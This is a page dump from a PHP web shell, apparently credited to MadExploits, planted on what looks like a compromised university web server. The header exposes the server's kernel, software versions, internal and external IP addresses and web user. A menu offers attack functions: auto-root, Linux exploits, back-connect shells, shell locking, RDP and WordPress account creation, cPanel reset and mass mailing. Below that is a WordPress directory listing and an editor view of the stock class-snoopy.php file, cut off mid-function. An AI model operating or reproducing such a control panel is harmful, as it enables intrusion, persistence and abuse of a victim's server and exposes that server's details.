Linux web-conference.aiou.edu.pk 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64
Apache/2.4.41 (Ubuntu)
: 172.16.50.247 | : 18.221.165.190
Cant Read [ /etc/named.conf ]
7.4.3-4ubuntu2.28
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
var /
www /
html /
aaou /
wp-includes /
[ HOME SHELL ]
Name
Size
Permission
Action
ID3
[ DIR ]
drwxrwxr-x
IXR
[ DIR ]
drwxrwxr-x
PHPMailer
[ DIR ]
drwxrwxr-x
Requests
[ DIR ]
drwxrwxr-x
SimplePie
[ DIR ]
drwxrwxr-x
Text
[ DIR ]
drwxrwxr-x
assets
[ DIR ]
drwxrwxr-x
block-patterns
[ DIR ]
drwxrwxr-x
block-supports
[ DIR ]
drwxrwxr-x
blocks
[ DIR ]
drwxrwxr-x
certificates
[ DIR ]
drwxrwxr-x
css
[ DIR ]
drwxrwxr-x
customize
[ DIR ]
drwxrwxr-x
fonts
[ DIR ]
drwxrwxr-x
html-api
[ DIR ]
drwxrwxr-x
images
[ DIR ]
drwxrwxr-x
js
[ DIR ]
drwxrwxr-x
php-compat
[ DIR ]
drwxrwxr-x
pomo
[ DIR ]
drwxrwxr-x
rest-api
[ DIR ]
drwxrwxr-x
sitemaps
[ DIR ]
drwxrwxr-x
sodium_compat
[ DIR ]
drwxrwxr-x
style-engine
[ DIR ]
drwxrwxr-x
theme-compat
[ DIR ]
drwxrwxr-x
widgets
[ DIR ]
drwxrwxr-x
admin-bar.php
35.15
KB
-rw-rw-r--
atomlib.php
11.67
KB
-rw-rw-r--
author-template.php
18.51
KB
-rw-rw-r--
block-editor.php
27.27
KB
-rw-rw-r--
block-i18n.json
316
B
-rw-rw-r--
block-patterns.php
12.64
KB
-rw-rw-r--
block-template-utils.php
47.35
KB
-rw-rw-r--
block-template.php
12
KB
-rw-rw-r--
blocks.php
69.78
KB
-rw-rw-r--
bookmark-template.php
12.61
KB
-rw-rw-r--
bookmark.php
15.02
KB
-rw-rw-r--
cache-compat.php
5.83
KB
-rw-rw-r--
cache.php
13.16
KB
-rw-rw-r--
canonical.php
33.27
KB
-rw-rw-r--
capabilities.php
39.09
KB
-rw-rw-r--
category-template.php
55.67
KB
-rw-rw-r--
category.php
12.41
KB
-rw-rw-r--
class-IXR.php
2.48
KB
-rw-rw-r--
class-feed.php
529
B
-rw-rw-r--
class-http.php
367
B
-rw-rw-r--
class-json.php
42.66
KB
-rw-rw-r--
class-oembed.php
401
B
-rw-rw-r--
class-phpass.php
6.55
KB
-rw-rw-r--
class-phpmailer.php
664
B
-rw-rw-r--
class-pop3.php
20.48
KB
-rw-rw-r--
class-requests.php
2.18
KB
-rw-rw-r--
class-simplepie.php
95.82
KB
-rw-rw-r--
class-smtp.php
457
B
-rw-rw-r--
class-snoopy.php
36.83
KB
-rw-rw-r--
class-walker-category-dropdown...
2.41
KB
-rw-rw-r--
class-walker-category.php
8.28
KB
-rw-rw-r--
class-walker-comment.php
13.88
KB
-rw-rw-r--
class-walker-nav-menu.php
11.05
KB
-rw-rw-r--
class-walker-page-dropdown.php
2.65
KB
-rw-rw-r--
class-walker-page.php
7.43
KB
-rw-rw-r--
class-wp-admin-bar.php
16.96
KB
-rw-rw-r--
class-wp-ajax-response.php
5.14
KB
-rw-rw-r--
class-wp-application-passwords...
12.55
KB
-rw-rw-r--
class-wp-block-editor-context....
1.32
KB
-rw-rw-r--
class-wp-block-list.php
4.66
KB
-rw-rw-r--
class-wp-block-parser-block.ph...
2.5
KB
-rw-rw-r--
class-wp-block-parser-frame.ph...
1.87
KB
-rw-rw-r--
class-wp-block-parser.php
11.26
KB
-rw-rw-r--
class-wp-block-pattern-categor...
5.25
KB
-rw-rw-r--
class-wp-block-patterns-regist...
9.84
KB
-rw-rw-r--
class-wp-block-styles-registry...
5.75
KB
-rw-rw-r--
class-wp-block-supports.php
5.39
KB
-rw-rw-r--
class-wp-block-template.php
1.91
KB
-rw-rw-r--
class-wp-block-type-registry.p...
4.9
KB
-rw-rw-r--
class-wp-block-type.php
14.4
KB
-rw-rw-r--
class-wp-block.php
8.2
KB
-rw-rw-r--
class-wp-classic-to-block-menu...
3.99
KB
-rw-rw-r--
class-wp-comment-query.php
46.71
KB
-rw-rw-r--
class-wp-comment.php
9.15
KB
-rw-rw-r--
class-wp-customize-control.php
25.24
KB
-rw-rw-r--
class-wp-customize-manager.php
197.52
KB
-rw-rw-r--
class-wp-customize-nav-menus.p...
55.97
KB
-rw-rw-r--
class-wp-customize-panel.php
10.42
KB
-rw-rw-r--
class-wp-customize-section.php
10.98
KB
-rw-rw-r--
class-wp-customize-setting.php
29.19
KB
-rw-rw-r--
class-wp-customize-widgets.php
69.93
KB
-rw-rw-r--
class-wp-date-query.php
34.88
KB
-rw-rw-r--
class-wp-dependencies.php
13.73
KB
-rw-rw-r--
class-wp-dependency.php
2.57
KB
-rw-rw-r--
class-wp-duotone.php
38.52
KB
-rw-rw-r--
class-wp-editor.php
70.39
KB
-rw-rw-r--
class-wp-embed.php
15.62
KB
-rw-rw-r--
class-wp-error.php
7.33
KB
-rw-rw-r--
class-wp-fatal-error-handler.p...
7.69
KB
-rw-rw-r--
class-wp-feed-cache-transient....
2.53
KB
-rw-rw-r--
class-wp-feed-cache.php
969
B
-rw-rw-r--
class-wp-hook.php
15.63
KB
-rw-rw-r--
class-wp-http-cookie.php
7.22
KB
-rw-rw-r--
class-wp-http-curl.php
12.25
KB
-rw-rw-r--
class-wp-http-encoding.php
6.53
KB
-rw-rw-r--
class-wp-http-ixr-client.php
3.42
KB
-rw-rw-r--
class-wp-http-proxy.php
5.84
KB
-rw-rw-r--
class-wp-http-requests-hooks.p...
1.97
KB
-rw-rw-r--
class-wp-http-requests-respons...
4.3
KB
-rw-rw-r--
class-wp-http-response.php
2.91
KB
-rw-rw-r--
class-wp-http-streams.php
16.46
KB
-rw-rw-r--
class-wp-http.php
39.63
KB
-rw-rw-r--
class-wp-image-editor-gd.php
17.11
KB
-rw-rw-r--
class-wp-image-editor-imagick....
30.47
KB
-rw-rw-r--
class-wp-image-editor.php
17.17
KB
-rw-rw-r--
class-wp-list-util.php
7.27
KB
-rw-rw-r--
class-wp-locale-switcher.php
6.41
KB
-rw-rw-r--
class-wp-locale.php
15.74
KB
-rw-rw-r--
class-wp-matchesmapregex.php
1.78
KB
-rw-rw-r--
class-wp-meta-query.php
29.82
KB
-rw-rw-r--
class-wp-metadata-lazyloader.p...
6.67
KB
-rw-rw-r--
class-wp-navigation-fallback.p...
9
KB
-rw-rw-r--
class-wp-network-query.php
18.84
KB
-rw-rw-r--
class-wp-network.php
11.9
KB
-rw-rw-r--
class-wp-object-cache.php
17.18
KB
-rw-rw-r--
class-wp-oembed-controller.php
6.72
KB
-rw-rw-r--
class-wp-oembed.php
30.66
KB
-rw-rw-r--
class-wp-paused-extensions-sto...
4.94
KB
-rw-rw-r--
class-wp-post-type.php
29.28
KB
-rw-rw-r--
class-wp-post.php
6.33
KB
-rw-rw-r--
class-wp-query.php
148.03
KB
-rw-rw-r--
class-wp-recovery-mode-cookie-...
6.72
KB
-rw-rw-r--
class-wp-recovery-mode-email-s...
10.92
KB
-rw-rw-r--
class-wp-recovery-mode-key-ser...
4.4
KB
-rw-rw-r--
class-wp-recovery-mode-link-se...
3.38
KB
-rw-rw-r--
class-wp-recovery-mode.php
11.17
KB
-rw-rw-r--
class-wp-rewrite.php
61.94
KB
-rw-rw-r--
class-wp-role.php
2.46
KB
-rw-rw-r--
class-wp-roles.php
8.38
KB
-rw-rw-r--
class-wp-scripts.php
27.99
KB
-rw-rw-r--
class-wp-session-tokens.php
7.28
KB
-rw-rw-r--
class-wp-simplepie-file.php
3.3
KB
-rw-rw-r--
class-wp-simplepie-sanitize-ks...
1.73
KB
-rw-rw-r--
class-wp-site-query.php
30.29
KB
-rw-rw-r--
class-wp-site.php
7.28
KB
-rw-rw-r--
class-wp-styles.php
10.64
KB
-rw-rw-r--
class-wp-tax-query.php
19.09
KB
-rw-rw-r--
class-wp-taxonomy.php
18.13
KB
-rw-rw-r--
class-wp-term-query.php
40.05
KB
-rw-rw-r--
class-wp-term.php
5.17
KB
-rw-rw-r--
class-wp-text-diff-renderer-in...
829
B
-rw-rw-r--
class-wp-text-diff-renderer-ta...
18.37
KB
-rw-rw-r--
class-wp-textdomain-registry.p...
5.84
KB
-rw-rw-r--
class-wp-theme-json-data.php
1.52
KB
-rw-rw-r--
class-wp-theme-json-resolver.p...
24.06
KB
-rw-rw-r--
class-wp-theme-json-schema.php
4.12
KB
-rw-rw-r--
class-wp-theme-json.php
126.52
KB
-rw-rw-r--
class-wp-theme.php
62.76
KB
-rw-rw-r--
class-wp-user-meta-session-tok...
2.92
KB
-rw-rw-r--
class-wp-user-query.php
42.37
KB
-rw-rw-r--
class-wp-user-request.php
2.17
KB
-rw-rw-r--
class-wp-user.php
22.23
KB
-rw-rw-r--
class-wp-walker.php
12.86
KB
-rw-rw-r--
class-wp-widget-factory.php
3.27
KB
-rw-rw-r--
class-wp-widget.php
17.96
KB
-rw-rw-r--
class-wp-xmlrpc-server.php
209.12
KB
-rw-rw-r--
class-wp.php
25.51
KB
-rw-rw-r--
class-wpdb.php
116.66
KB
-rw-rw-r--
class.wp-dependencies.php
373
B
-rw-rw-r--
class.wp-scripts.php
343
B
-rw-rw-r--
class.wp-styles.php
338
B
-rw-rw-r--
comment-template.php
99.05
KB
-rw-rw-r--
comment.php
126.09
KB
-rw-rw-r--
compat.php
14.86
KB
-rw-rw-r--
cron.php
40.5
KB
-rw-rw-r--
date.php
400
B
-rw-rw-r--
default-constants.php
10.91
KB
-rw-rw-r--
default-filters.php
33.7
KB
-rw-rw-r--
default-widgets.php
2.17
KB
-rw-rw-r--
deprecated.php
179.5
KB
-rw-rw-r--
embed-template.php
338
B
-rw-rw-r--
embed.php
36.78
KB
-rw-rw-r--
error-protection.php
4.02
KB
-rw-rw-r--
feed-atom-comments.php
5.32
KB
-rw-rw-r--
feed-atom.php
2.98
KB
-rw-rw-r--
feed-rdf.php
2.61
KB
-rw-rw-r--
feed-rss.php
1.16
KB
-rw-rw-r--
feed-rss2-comments.php
3.98
KB
-rw-rw-r--
feed-rss2.php
3.71
KB
-rw-rw-r--
feed.php
22.52
KB
-rw-rw-r--
fonts.php
2.28
KB
-rw-rw-r--
formatting.php
327.07
KB
-rw-rw-r--
functions.php
269.73
KB
-rw-rw-r--
functions.wp-scripts.php
14.41
KB
-rw-rw-r--
functions.wp-styles.php
8.38
KB
-rw-rw-r--
general-template.php
163.79
KB
-rw-rw-r--
global-styles-and-settings.php
19.73
KB
-rw-rw-r--
http.php
23.29
KB
-rw-rw-r--
https-detection.php
5.53
KB
-rw-rw-r--
https-migration.php
4.63
KB
-rw-rw-r--
kses.php
70.21
KB
-rw-rw-r--
l10n.php
61.31
KB
-rw-rw-r--
link-template.php
152.42
KB
-rw-rw-r--
load.php
52.86
KB
-rw-rw-r--
locale.php
162
B
-rw-rw-r--
media-template.php
60.37
KB
-rw-rw-r--
media.php
202.5
KB
-rw-rw-r--
meta.php
62.58
KB
-rw-rw-r--
ms-blogs.php
25.03
KB
-rw-rw-r--
ms-default-constants.php
4.79
KB
-rw-rw-r--
ms-default-filters.php
6.48
KB
-rw-rw-r--
ms-deprecated.php
21.25
KB
-rw-rw-r--
ms-files.php
2.65
KB
-rw-rw-r--
ms-functions.php
89.12
KB
-rw-rw-r--
ms-load.php
19.4
KB
-rw-rw-r--
ms-network.php
3.69
KB
-rw-rw-r--
ms-settings.php
4.03
KB
-rw-rw-r--
ms-site.php
39.55
KB
-rw-rw-r--
nav-menu-template.php
25.18
KB
-rw-rw-r--
nav-menu.php
43.04
KB
-rw-rw-r--
option.php
89.2
KB
-rw-rw-r--
pluggable-deprecated.php
6.12
KB
-rw-rw-r--
pluggable.php
110.37
KB
-rw-rw-r--
plugin.php
34.63
KB
-rw-rw-r--
post-formats.php
6.93
KB
-rw-rw-r--
post-template.php
65.23
KB
-rw-rw-r--
post-thumbnail-template.php
10.07
KB
-rw-rw-r--
post.php
271.8
KB
-rw-rw-r--
query.php
36.17
KB
-rw-rw-r--
registration-functions.php
200
B
-rw-rw-r--
registration.php
200
B
-rw-rw-r--
rest-api.php
94.87
KB
-rw-rw-r--
revision.php
30.18
KB
-rw-rw-r--
rewrite.php
19.06
KB
-rw-rw-r--
robots-template.php
5.06
KB
-rw-rw-r--
rss-functions.php
255
B
-rw-rw-r--
rss.php
22.48
KB
-rw-rw-r--
script-loader.php
127.03
KB
-rw-rw-r--
session.php
258
B
-rw-rw-r--
shortcodes.php
23.3
KB
-rw-rw-r--
sitemaps.php
3.16
KB
-rw-rw-r--
spl-autoload-compat.php
441
B
-rw-rw-r--
style-engine.php
7.03
KB
-rw-rw-r--
taxonomy.php
169.46
KB
-rw-rw-r--
template-canvas.php
544
B
-rw-rw-r--
template-loader.php
2.94
KB
-rw-rw-r--
template.php
22.97
KB
-rw-rw-r--
theme-i18n.json
1.12
KB
-rw-rw-r--
theme-previews.php
2.76
KB
-rw-rw-r--
theme-templates.php
6.08
KB
-rw-rw-r--
theme.json
7.13
KB
-rw-rw-r--
theme.php
128.13
KB
-rw-rw-r--
update.php
35.96
KB
-rw-rw-r--
user.php
167.14
KB
-rw-rw-r--
vars.php
6.06
KB
-rw-rw-r--
version.php
928
B
-rw-rw-r--
widgets.php
68.24
KB
-rw-rw-r--
wp-db.php
445
B
-rw-rw-r--
wp-diff.php
647
B
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : class-snoopy.php
<?php /** * Deprecated. Use WP_HTTP (http.php) instead. */ _deprecated_file( basename( __FILE__ ), '3.0.0', WPINC . '/http.php' ); if ( ! class_exists( 'Snoopy', false ) ) : /************************************************* Snoopy - the PHP net client Author: Monte Ohrt <monte@ispi.net> Copyright (c): 1999-2008 New Digital Group, all rights reserved Version: 1.2.4 * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2.1 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, write to the Free Software * Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA You may contact the author of Snoopy by e-mail at: monte@ohrt.com The latest version of Snoopy can be obtained from: http://snoopy.sourceforge.net/ *************************************************/ class Snoopy { /**** Public variables ****/ /* user definable vars */ var $host = "www.php.net"; // host name we are connecting to var $port = 80; // port we are connecting to var $proxy_host = ""; // proxy host to use var $proxy_port = ""; // proxy port to use var $proxy_user = ""; // proxy user to use var $proxy_pass = ""; // proxy password to use var $agent = "Snoopy v1.2.4"; // agent we masquerade as var $referer = ""; // referer info to pass var $cookies = array(); // array of cookies to pass // $cookies["username"]="joe"; var $rawheaders = array(); // array of raw headers to send // $rawheaders["Content-Type"]="text/html"; var $maxredirs = 5; // http redirection depth maximum. 0 = disallow var $lastredirectaddr = ""; // contains address of last redirected address var $offsiteok = true; // allows redirection off-site var $maxframes = 0; // frame content depth maximum. 0 = disallow var $expandlinks = true; // expand links to fully qualified URLs. // this only applies to fetchlinks() // submitlinks(), and submittext() var $passcookies = true; // pass set cookies back through redirects // NOTE: this currently does not respect // dates, domains or paths. var $user = ""; // user for http authentication var $pass = ""; // password for http authentication // http accept types var $accept = "image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*"; var $results = ""; // where the content is put var $error = ""; // error messages sent here var $response_code = ""; // response code returned from server var $headers = array(); // headers returned from server sent here var $maxlength = 500000; // max return data length (body) var $read_timeout = 0; // timeout on read operations, in seconds // supported only since PHP 4 Beta 4 // set to 0 to disallow timeouts var $timed_out = false; // if a read operation timed out var $status = 0; // http request status var $temp_dir = "/tmp"; // temporary directory that the webserver // has permission to write to. // under Windows, this should be C:\temp var $curl_path = "/usr/local/bin/curl"; // Snoopy will use cURL for fetching // SSL content if a full system path to // the cURL binary is supplied here. // set to false if you do not have // cURL installed. See http://curl.haxx.se // for details on installing cURL. // Snoopy does *not* use the cURL // library functions built into php, // as these functions are not stable // as of this Snoopy release. /**** Private variables ****/ var $_maxlinelen = 4096; // max line length (headers) var $_httpmethod = "GET"; // default http request method var $_httpversion = "HTTP/1.0"; // default http request version var $_submit_method = "POST"; // default submit method var $_submit_type = "application/x-www-form-urlencoded"; // default submit type var $_mime_boundary = ""; // MIME boundary for multipart/form-data submit type var $_redirectaddr = false; // will be set if page fetched is a redirect var $_redirectdepth = 0; // increments on an http redirect var $_frameurls = array(); // frame src urls var $_framedepth = 0; // increments on frame depth var $_isproxy = false; // set if using a proxy server var $_fp_timeout = 30; // timeout for socket connection /*======================================================================*\ Function: fetch Purpose: fetch the contents of a web page (and possibly other protocols in the future like ftp, nntp, gopher, etc.) Input: $URI the location of the page to fetch Output: $this->results the output text from the fetch \*======================================================================*/ function fetch($URI) { //preg_match("|^([^:]+)://([^:/]+)(:[\d]+)*(.*)|",$URI,$URI_PARTS); $URI_PARTS = parse_url($URI); if (!empty($URI_PARTS["user"])) $this->user = $URI_PARTS["user"]; if (!empty($URI_PARTS["pass"])) $this->pass = $URI_PARTS["pass"]; if (empty($URI_PARTS["query"])) $URI_PARTS["query"] = ''; if (empty($URI_PARTS["path"])) $URI_PARTS["path"] = ''; switch(strtolower($URI_PARTS["scheme"])) { case "http": $this->host = $URI_PARTS["host"]; if(!empty($URI_PARTS["port"])) $this->port = $URI_PARTS["port"]; if($this->_connect($fp)) { if($this->_isproxy) { // using proxy, send entire URI $this->_httprequest($URI,$fp,$URI,$this->_httpmethod); } else { $path = $URI_PARTS["path"].($URI_PARTS["query"] ? "?".$URI_PARTS["query"] : ""); // no proxy, send only the path $this->_httprequest($path, $fp, $URI, $this->_httpmethod); } $this->_disconnect($fp); if($this->_redirectaddr) { /* url was redirected, check if we've hit the max depth */ if($this->maxredirs > $this->_redirectdepth) { // only follow redirect if it's on this site, or offsiteok is true if(preg_match("|^http://".preg_quote($this->host)."|i",$this->_redirectaddr) || $this->offsiteok) { /* follow the redirect */ $this->_redirectdepth++; $this->lastredirectaddr=$this->_redirectaddr; $this->fetch($this->_redirectaddr); } } } if($this->_framedepth < $this->maxframes && count($this->_frameurls) > 0) { $frameurls = $this->_frameurls; $this->_frameurls = array(); foreach ( $frameurls as $frameurl ) { if($this->_framedepth < $this->maxframes) { $this->fetch($frameurl); $this->_framedepth++; } else break; } } } else { return false; } return true; break; case "https": if(!$this->curl_path) return false; if(function_exists("is_executable")) if (!is_executable($this->curl_path)) return false; $this->host = $URI_PARTS["host"]; if(!empty($URI_PARTS["port"])) $this->port = $URI_PARTS["port"]; if($this->_isproxy) { // using proxy, send entire URI $this->_httpsrequest($URI,$URI,$this->_httpmethod); } else { $path = $URI_PARTS["path"].($URI_PARTS["query"] ? "?".$URI_PARTS["query"] : ""); // no proxy, send only the path $this->_httpsrequest($path, $URI, $this->_httpmethod); } if($this->_redirectaddr) { /* url was redirected, check if we've hit the max depth */ if($this->maxredirs > $this->_redirectdepth) { // only follow redirect if it's on this site, or offsiteok is true if(preg_match("|^http://".preg_quote($this->host)."|i",$this->_redirectaddr) || $this->offsiteok) { /* follow the redirect */ $this->_redirectdepth++; $this->lastredirectaddr=$this->_redirectaddr; $this->fetch($this->_redirectaddr); } } } if($this->_framedepth < $this->maxframes && count($this->_frameurls) > 0) { $frameurls = $this->_frameurls; $this->_frameurls = array(); foreach ( $frameurls as $frameurl ) { if($this->_framedepth < $this->maxframes) { $this->fetch($frameurl); $this->_framedepth++; } else break; } } return true; break; default: // not a valid protocol $this->error = 'Invalid protocol "'.$URI_PARTS["scheme"].'"\n'; return false; break; } return true; } /*======================================================================*\ Function: submit Purpose: submit an http form Input: $URI the location to post the data $formvars the formvars to use. format: $formvars["var"] = "val"; $formfiles an array of files to submit format: $formfiles["var"] = "/dir/filename.ext"; Output: $this->results the text output from the post \*======================================================================*/ function submit($URI, $formvars="", $formfiles="") { unset($postdata); $postdata = $this->_prepare_post_body($formvars, $formfiles); $URI_PARTS = parse_url($URI); if (!empty($URI_PARTS["user"])) $this->user = $URI_PARTS["user"]; if (!empty($URI_PARTS["pass"])) $this->pass = $URI_PARTS["pass"]; if (empty($URI_PARTS["query"])) $URI_PARTS["query"] = ''; if (empty($URI_PARTS["path"])) $URI_PARTS["path"] = ''; switch(strtolower($URI_PARTS["scheme"])) { case "http": $this->host = $URI_PARTS["host"]; if(!empty($URI_PARTS["port"])) $this->port = $URI_PARTS["port"]; if($this->_connect($fp)) { if($this->_isproxy) { // using proxy, send entire URI $this->_httprequest($URI,$fp,$URI,$this->_submit_method,$this->_submit_type,$postdata); } else { $path = $URI_PARTS["path"].($URI_PARTS["query"] ? "?".$URI_PARTS["query"] : ""); // no proxy, send only the path $this->_httprequest($path, $fp, $URI, $this->_submit_method, $this->_submit_type, $postdata); } $this->_disconnect($fp); if($this->_redirectaddr) { /* url was redirected, check if we've hit the max depth */ if($this->maxredirs > $this->_redirectdepth) { if(!preg_match("|^".$URI_PARTS["scheme"]."://|", $this->_redirectaddr)) $this->_redirectaddr = $this->_expandlinks($this->_redirectaddr,$URI_PARTS["scheme"]."://".$URI_PARTS["host"]); // only follow redirect if it's on this site, or offsiteok is true if(preg_match("|^http://".preg_quote($this->host)."|i",$this->_redirectaddr) || $this->offsiteok) { /* follow the redirect */ $this->_redirectdepth++; $this->lastredirectaddr=$this->_redirectaddr; if( strpos( $this->_redirectaddr, "?" ) > 0 ) $this->fetch($this->_redirectaddr); // the redirect has changed the request method from post to get else $this->submit($this->_redirectaddr,$formvars, $formfiles); } } } if($this->_framedepth < $this->maxframes && count($this->_frameurls) > 0) { $frameurls = $this->_frameurls; $this->_frameurls = array(); foreach ( $frameurls as $frameurl ) { if($this->_framedepth < $this->maxframes) { $this->fetch($frameurl); $this->_framedepth++; } else break; } } } else { return false; } return true; break; case "https": if(!$this->curl_path) return false; if(function_exists("is_executable")) if (!is_executable($this->curl_path)) return false; $this->host = $URI_PARTS["host"]; if(!empty($URI_PARTS["port"])) $this->port = $URI_PARTS["port"]; if($this->_isproxy) { // using proxy, send entire URI $this->_httpsrequest($URI, $URI, $this->_submit_method, $this->_submit_type, $postdata); } else { $path = $URI_PARTS["path"].($URI_PARTS["query"] ? "?".$URI_PARTS["query"] : ""); // no proxy, send only the path $this->_httpsrequest($path, $URI, $this->_submit_method, $this->_submit_type, $postdata); } if($this->_redirectaddr) { /* url was redirected, check if we've hit the max depth */ if($this->maxredirs > $this->_redirectdepth) { if(!preg_match("|^".$URI_PARTS["scheme"]."://|", $this->_redirectaddr)) $this->_redirectaddr = $this->_expandlinks($this->_redirectaddr,$URI_PARTS["scheme"]."://".$URI_PARTS["host"]); // only follow redirect if it's on this site, or offsiteok is true if(preg_match("|^http://".preg_quote($this->host)."|i",$this->_redirectaddr) || $this->offsiteok) { /* follow the redirect */ $this->_redirectdepth++; $this->lastredirectaddr=$this->_redirectaddr; if( strpos( $this->_redirectaddr, "?" ) > 0 ) $this->fetch($this->_redirectaddr); // the redirect has changed the request method from post to get else $this->submit($this->_redirectaddr,$formvars, $formfiles); } } } if($this->_framedepth < $this->maxframes && count($this->_frameurls) > 0) { $frameurls = $this->_frameurls; $this->_frameurls = array(); foreach ( $frameurls as $frameurl ) { if($this->_framedepth < $this->maxframes) { $this->fetch($frameurl); $this->_framedepth++; } else break; } } return true; break; default: // not a valid protocol $this->error = 'Invalid protocol "'.$URI_PARTS["scheme"].'"\n'; return false; break; } return true; } /*======================================================================*\ Function: fetchlinks Purpose: fetch the links from a web page Input: $URI where you are fetching from Output: $this->results an array of the URLs \*======================================================================*/ function fetchlinks($URI) { if ($this->fetch($URI)) { if($this->lastredirectaddr) $URI = $this->lastredirectaddr; if(is_array($this->results)) { for($x=0;$x<count($this->results);$x++) $this->results[$x] = $this->_striplinks($this->results[$x]); } else $this->results = $this->_striplinks($this->results); if($this->expandlinks) $this->results = $this->_expandlinks($this->results, $URI); return true; } else return false; } /*======================================================================*\ Function: fetchform Purpose: fetch the form elements from a web page Input: $URI where you are fetching from Output: $this->results the resulting html form \*======================================================================*/ function fetchform($URI) { if ($this->fetch($URI)) { if(is_array($this->results)) { for($x=0;$x<count($this->results);$x++) $this->results[$x] = $this->_stripform($this->results[$x]); } else $this->results = $this->_stripform($this->results); return true; } else return false; } /*======================================================================*\ Function: fetchtext Purpose: fetch the text from a web page, stripping the links Input: $URI where you are fetching from Output: $this->results the text from the web page \*======================================================================*/ function fetchtext($URI) { if($this->fetch($URI)) { if(is_array($this->results)) { for($x=0;$x<count($this->results);$x++) $this->results[$x] = $this->_striptext($this->results[$x]); } else $this->results = $this->_striptext($this->results); return true; } else return false; } /*======================================================================*\ Function: submitlinks Purpose: grab links from a form submission Input: $URI where you are submitting from Output: $this->results an array of the links from the post \*======================================================================*/ function submitlinks($URI, $formvars="", $formfiles="") { if($this->submit($URI,$formvars, $formfiles)) { if($this->lastredirectaddr) $URI = $this->lastredirectaddr; if(is_array($this->results)) { for($x=0;$x<count($this->results);$x++) { $this->results[$x] = $this->_striplinks($this->results[$x]); if($this->expandlinks) $this->results[$x] = $this->_expandlinks($this->results[$x],$URI); } } else { $this->results = $this->_striplinks($this->results); if($this->expandlinks) $this->results = $this->_expandlinks($this->results,$URI); } return true; } else return false; } /*======================================================================*\ Function: submittext Purpose: grab text from a form submission Input: $URI where you are submitting from Output: $this->results the text from the web page \*======================================================================*/ function submittext($URI, $formvars = "", $formfiles = "") { if($this->submit($URI,$formvars, $formfiles)) { if($this->lastredirectaddr) $URI = $this->lastredirectaddr; if(is_array($this->results)) { for($x=0;$x<count($this->results);$x++) { $this->results[$x] = $this->_striptext($this->results[$x]); if($this->expandlinks) $this->results[$x] = $this->_expandlinks($this->results[$x],$URI); } } else { $this->results = $this->_striptext($this->results); if($this->expandlinks) $this->results = $this->_expandlinks($this->results,$URI); } return true; } else return false; } /*======================================================================*\ Function: set_submit_multipart Purpose: Set the form submission content type to multipart/form-data \*======================================================================*/ function set_submit_multipart() { $this->_submit_type = "multipart/form-data"; } /*======================================================================*\ Function: set_submit_normal Purpose: Set the form submission content type to application/x-www-form-urlencoded \*======================================================================*/ function set_submit_normal() { $this->_submit_type = "application/x-www-form-urlencoded"; } /*======================================================================*\ Private functions \*======================================================================*/ /*======================================================================*\ Function: _striplinks Purpose: strip the hyperlinks from an html document Input: $document document to strip. Output: $match an array of the links \*======================================================================*/ function _striplinks($document) { preg_match_all("'<\s*a\s.*?href\s*=\s* # find <a href= ([\"\'])? # find single or double quote (?(1) (.*?)\\1 | ([^\s\>]+)) # if quote found, match up to next matching # quote, otherwise match up to next space 'isx",$document,$links); // catenate the non-empty matches from the conditional subpattern foreach ( $links[2] as $key => $val ) { if(!empty($val)) $match[] = $val; } foreach ( $links[3] as $key => $val ) { if(!empty($val)) $match[] = $val; } // return the links return $match; } /*======================================================================*\ Function: _stripform Purpose: strip the form elements from an html document Input: $document document to strip. Output: $match an array of the links \*======================================================================*/ function _stripform($document) { preg_match_all("'<\/?(FORM|INPUT|SELECT|TEXTAREA|(OPTION))[^<>]*>(?(2)(.*(?=<\/?(option|select)[^<>]*>[\r\n]*)|(?=[\r\n]*))|(?=[\r\n]*))'Usi",$document,$elements); // catenate the matches $match = implode("\r\n",$elements[0]); // return the links return $match; } /*======================================================================*\ Function: _striptext Purpose: strip the text from an html document Input: $document document to strip. Output: $text the resulting text \*======================================================================*/ function _striptext($document) { // I didn't use preg eval (//e) since that is only available in PHP 4.0. // so, list your entities one by one here. I included some of the // more common ones. $search = array("'<script[^>]*?>.*?</script>'si", // strip out javascript "'<[\/\!]*?[^<>]*?>'si", // strip out html tags "'([\r\n])[\s]+'", // strip out white space "'&(quot|#34|#034|#x22);'i", // replace html entities "'&(amp|#38|#038|#x26);'i", // added hexadecimal values "'&(lt|#60|#060|#x3c);'i", "'&(gt|#62|#062|#x3e);'i", "'&(nbsp|#160|#xa0);'i", "'&(iexcl|#161);'i", "'&(cent|#162);'i", "'&(pound|#163);'i", "'&(copy|#169);'i", "'&(reg|#174);'i", "'&(deg|#176);'i", "'&(#39|#039|#x27);'", "'&(euro|#8364);'i", // europe "'&a(uml|UML);'", // german "'&o(uml|UML);'", "'&u(uml|UML);'", "'&A(uml|UML);'", "'&O(uml|UML);'", "'&U(uml|UML);'", "'ß'i", ); $replace = array( "", "", "\\1", "\"", "&", "<", ">", " ", chr(161), chr(162), chr(163), chr(169), chr(174), chr(176), chr(39), chr(128), chr(0xE4), // ANSI ä chr(0xF6), // ANSI ö chr(0xFC), // ANSI ü chr(0xC4), // ANSI Ä chr(0xD6), // ANSI Ö chr(0xDC), // ANSI Ü chr(0xDF), // ANSI ß ); $text = preg_replace($search,$replace,$document); return $text; } /*======================================================================*\ Function: _expandlinks Purpose: expand each link into a fully qualified URL Input: $links the links to qualify $URI the full URI to get the base from Output: $expandedLinks the expanded links \*======================================================================*/ function _expandlinks($links,$URI) { preg_match("/^[^\?]+/",$URI,$match); $match = preg_replace("|/[^\/\.]+\.[^\/\.]+$|","",$match[0]); $match = preg_replace("|/$|","",$match); $match_part = parse_url($match); $match_root = $match_part["scheme"]."://".$match_part["host"]; $search = array( "|^http://".preg_quote($this->host)."|i", "|^(\/)|i", 